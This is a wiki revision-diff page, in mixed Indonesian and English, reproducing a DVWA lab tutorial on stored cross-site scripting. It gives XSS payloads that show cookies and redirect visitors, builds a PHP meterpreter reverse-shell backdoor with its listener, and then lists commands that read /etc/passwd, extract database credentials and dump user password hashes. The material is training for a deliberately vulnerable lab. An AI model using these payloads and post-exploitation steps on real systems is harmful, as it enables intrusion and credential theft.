DVWA: XSS: Difference between revisions

From OnnoCenterWiki
Jump to navigationJump to search
← Older editNewer edit →
Onnowpurbo (talk | contribs)
69,477 edits
Onnowpurbo (talk | contribs)
69,477 edits
Onnowpurbo (talk | contribs)
69,477 edits
Line 70: Line 70:
         This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here.
         This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here.
             e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images
             e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images
==XSS Stored COOKIE Exploit Test==
* Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
* Klik > XSS (Stored)
* Pada Nama isi "Test 3"
* Pada Message isi "<script>alert(document.cookie)</script>"
* Klik > Sign Guestbook
    Below is the cookie/session that the webserver establishes with the current browser session.
    An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it.
    Image if this was a bank website. Every time a user logs in their cookie information could be sent to a remote location.
==Build PHP msfpayload==
    mkdir -p /root/backdoor
    cd /root/backdoor
    msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php
    ls -l FORUM_BUG.php
    Select "Upload" from the left navigation menu.
    Click Browse
Start msfconsole
        msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.105
set LPORT 4444
exploit
==XSS Stored window.location Exploit Test==
* Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
* Klik > XSS (Stored)
Name: Test 4
Message:
    <script>window.location="http://192.168.1.106/dvwa/hackable/uploads/FORUM_BUG.php" </script>
        Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).
Click Sign Guestbook
Click OK when the Test 1 Message is displayed
shell
    Establishes a "sh" shell.
tail /etc/passwd
    This produces a potential prospect list for a ssh brute force attack
    whoami
        Displays the name of the user.
    grep apache /etc/passwd
        The goal of this command is obtaining the home directory for the apache username.
    find /var/www/* -print | grep config
        Here I am wanting to find all the configuration files in the /var/www directory.
    grep "db_" /var/www/html/dvwa/config/config.inc.php
        This produces the database name, username, and password information to log into the mysql database.
    echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
        This command produces a table list of the dvwa database.
    echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
        This command describes the columns of the users table in the dvwa datase.
    echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
        This command displays the user and password information for each user in the dvwa.users table.
    echo "<pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
        Place the html <pre> tag in the xss.html file.
        The <pre> is used as a pre-formatter.
    echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
        Place user and password for the dvwa.users table in the xss.html file.
    echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
        Place the close html </pre> tag in the xss.html file.
    echo "<br>Your Name<br>" >> /var/www/html/dvwa/hackable/uploads/xss.html
        Replace the string "Your Name" with your actual name.
    date >> /var/www/html/dvwa/hackable/uploads/xss.html
    On BackTrack, place the below URI in Firefox
        http://192.168.1.106/dvwa/hackable/uploads/xss.html
            Replace the above IP address with the IP Address obtained in (Section 3, Step 3).


==Referensi==
==Referensi==


* http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html
* http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html

Revision as of 02:30, 28 May 2017

sumber: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html

Tujuan

  • Test a basic cross site scripting (XSS) attack
  • Test an iframe cross site scripting (XSS) attack
  • Test a cookie cross site scripting (XSS) attack
  • Create a php/meterpreter/reverse_tcp payload
  • Start the php/meterpreter/reverse_tcp listener
  • Upload the PHP payload to the DVWA Upload screen
  • Test a PHP Payload cross site scripting (XSS) attack


Di sisi DVWA

Cek IP

ifconfig


Fix Stored Cross Site Scripting (XSS) Comment Box

Edit index.php 

cd /var/www/html/DVWA-1.9/vulnerabilities/xss_s/
vi index.php

Search dengan keyword mtxMessage Ubah maxlength=50

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea>

menjadi maxlength=250

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"250\"></textarea>

Di sisi Kali Linux

Cek IP Kali Linux

ifconfig -a

Enable Javascript di Browser

Buka Firefox
Preferences > Content > Uncheck - Block pop-up windows

Masuk ke DVWA

  • Login
  • DVWA Security > Low

XSS Stored Basic Exploit Test

  • Klik > XSS (Stored)
  • Pada Name isi "Test 1"
  • Pada Message isi "<script>alert("This is a XSS Exploit Test")</script>"
  • Klik > Sign Guestbook

XSS Stored IFRAME Exploit Test

  • Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
  • Klik > XSS (Stored)
  • Pada Nama isi "Test 2"
  • Pada Message isi "<iframe src="http://www.cnn.com"></iframe>"
  • Klik > Sign Guestbook

Tampak bahwa CNN muncul di bawah "Test 2" . 

       This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here.
           e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images
  • Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
  • Klik > XSS (Stored)
  • Pada Nama isi "Test 3"
  • Pada Message isi "<script>alert(document.cookie)</script>"
  • Klik > Sign Guestbook


   Below is the cookie/session that the webserver establishes with the current browser session.
   An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it.
   Image if this was a bank website. Every time a user logs in their cookie information could be sent to a remote location.


Build PHP msfpayload

   mkdir -p /root/backdoor
   cd /root/backdoor
   msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php
   ls -l FORUM_BUG.php



   Select "Upload" from the left navigation menu.
   Click Browse

Start msfconsole 


       msfconsole

use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.1.105 set LPORT 4444 exploit


XSS Stored window.location Exploit Test

  • Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
  • Klik > XSS (Stored)

Name: Test 4 Message: 

   <script>window.location="http://192.168.1.106/dvwa/hackable/uploads/FORUM_BUG.php" </script>
       Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).

Click Sign Guestbook Click OK when the Test 1 Message is displayed

shell 

   Establishes a "sh" shell.

tail /etc/passwd 

   This produces a potential prospect list for a ssh brute force attack

   whoami
       Displays the name of the user.
   grep apache /etc/passwd
       The goal of this command is obtaining the home directory for the apache username.
   find /var/www/* -print | grep config
       Here I am wanting to find all the configuration files in the /var/www directory.



   grep "db_" /var/www/html/dvwa/config/config.inc.php
       This produces the database name, username, and password information to log into the mysql database.
   echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
       This command produces a table list of the dvwa database.
   echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
       This command describes the columns of the users table in the dvwa datase.
   echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
       This command displays the user and password information for each user in the dvwa.users table.


echo "

" >> /var/www/html/dvwa/hackable/uploads/xss.html
        Place the html <pre> tag in the xss.html file.
        The <pre> is used as a pre-formatter.
    echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
        Place user and password for the dvwa.users table in the xss.html file.
    echo "

" >> /var/www/html/dvwa/hackable/uploads/xss.html Place the close html tag in the xss.html file. 

   echo "
Your Name
" >> /var/www/html/dvwa/hackable/uploads/xss.html
       Replace the string "Your Name" with your actual name.
   date >> /var/www/html/dvwa/hackable/uploads/xss.html




   On BackTrack, place the below URI in Firefox
       http://192.168.1.106/dvwa/hackable/uploads/xss.html
           Replace the above IP address with the IP Address obtained in (Section 3, Step 3).

Referensi

Retrieved from "https://lms.onnocenter.or.id/wiki/index.php?title=DVWA:_XSS&oldid=48200"